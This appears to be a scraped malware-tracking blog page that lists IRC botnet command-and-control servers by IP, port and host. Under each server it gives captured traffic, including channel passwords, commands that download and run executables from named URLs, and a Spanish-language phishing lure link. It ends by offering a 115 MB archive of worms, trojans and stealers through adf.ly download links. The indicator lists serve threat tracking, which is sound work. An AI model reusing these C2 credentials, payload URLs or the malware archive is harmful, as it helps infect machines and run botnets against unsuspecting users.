Remote Host Port Number 199.15.234.7 80 63.223.121.212 80 85.214.46.98 80 61.31.99.67 1863 61.31.99.67 4042 NICK new[USA|XP|COMPUTERNAME]ncsrmcq USER xd “” “lol” :xd JOIN #newbiz# PONG 422 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://www.4freeimagehost.com/uploads/a8dfab5dd1c0.jpg o http://85.214.46.98/test/new.exe o http://85.214.46.98/test/biz.exe hosting infos: http://whois.domaintools.com/61.31.99.67
31.3.254.125(irc botnet hosted in United Kingdom Redstation Limited)
Remote Host Port Number 31.3.254.125 6667 NICK new[iRooT-XP-USA]049101 USER 0491 “” “TsGh” :0491 JOIN #abece WTF PRIVMSG #abece : 04[P2P Spread]: 09Injecting into P2P Shared Folders… PONG :HTTP1.4 hosting infos: http://whois.domaintools.com/31.3.254.125
219.98.181.47(ngrBot hosted in Japan Tokyo So-net Service)
Remote Host Port Number 199.15.234.7 80 83.233.33.6 80 219.98.181.47 4244 PASS stark PRIVMSG #Nh :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}riqmriq USER riqmriq 0 0 :riqmriq JOIN #Nh NhG PRIVMSG #nh :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #nh :[HTTP]: Updated HTTP spread message to “Estas foto es tuyo? 😀 http://ho.io/p8zn?=www.facebook.com/profile/4373748”Read more...
184.154.174.202(ngrBot hosted in United States Chicago Singlehop Inc)
Remote Host Port Number 184.154.174.202 1888 PASS strike 199.15.234.7 80 70.38.98.236 80 NICK n{US|XPa}zjjqhnh USER zjjqhnh 0 0 :zjjqhnh JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img102.herosh.com/2011/09/26/125094789.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/184.154.174.202
74.50.57.232(GodBot hosted in United States Clay City Rimuhosting)
Remote Host Port Number 74.50.57.232 38 NICK Godbot|USA|XP|2202110 USER rhhnux “” “lol” :rhhnux JOIN #Internet# hosting infos: http://whois.domaintools.com/74.50.57.232
64.186.146.71(irc botnet hosted in United States Vpsland.com Llc)
Remote Host Port Number 64.186.146.71 4244 NICK new[iRooT-XP-USA]882912 USER 6372 “” “TsGh” :6372 JOIN #er# astar PONG :irc.undernet.org hosting infos: http://whois.domaintools.com/64.186.146.71
109.169.37.16(ngrBot hosted in United Kingdom Maidenhead Rapidswitch Ltd)
Remote Host Port Number 109.169.37.16 7777 PASS laekin0505x 199.15.234.7 80 65.254.250.108 80 NICK n{US|XPa}gvplpfy USER gvplpfy 0 0 :gvplpfy JOIN #totalrenovation2011 ngrBot PRIVMSG #totalrenovation2011 :[d=”http://teraniprom.com/admin/product_picture/FINAL.exe” s=”114688 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 PRIVMSG #totalrenovation2011 :[d=”http://teraniprom.com/admin/product_picture/Winsoft.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0 * TheRead more...
208.117.34.161(ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 208.117.34.161 1888 PASS strike NICK n{US|XPa}rpgrbzy USER rpgrbzy 0 0 :rpgrbzy JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img102.herosh.com/2011/09/23/174023232.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/208.117.34.161
178.162.148.126(Autumn bot hosted in Germany Frankfurt Netdirect)
Remote Host Port Number 178.162.148.126 4758 NICK [USA-XP-x86]31375 USER unreal 8 * :unreal JOIN #autumn autumn9857 PONG :680356A8 Now talking in #autumn Topic On: [ #autumn ] [] Topic By: [ Red ] hosting infos: http://whois.domaintools.com/178.162.148.126
115mb malware samples
This package contains 115mb of worms,trojans,irc bots,stealers etc have fun searching them Download: http://adf.ly/2rm49 http://adf.ly/2rmAC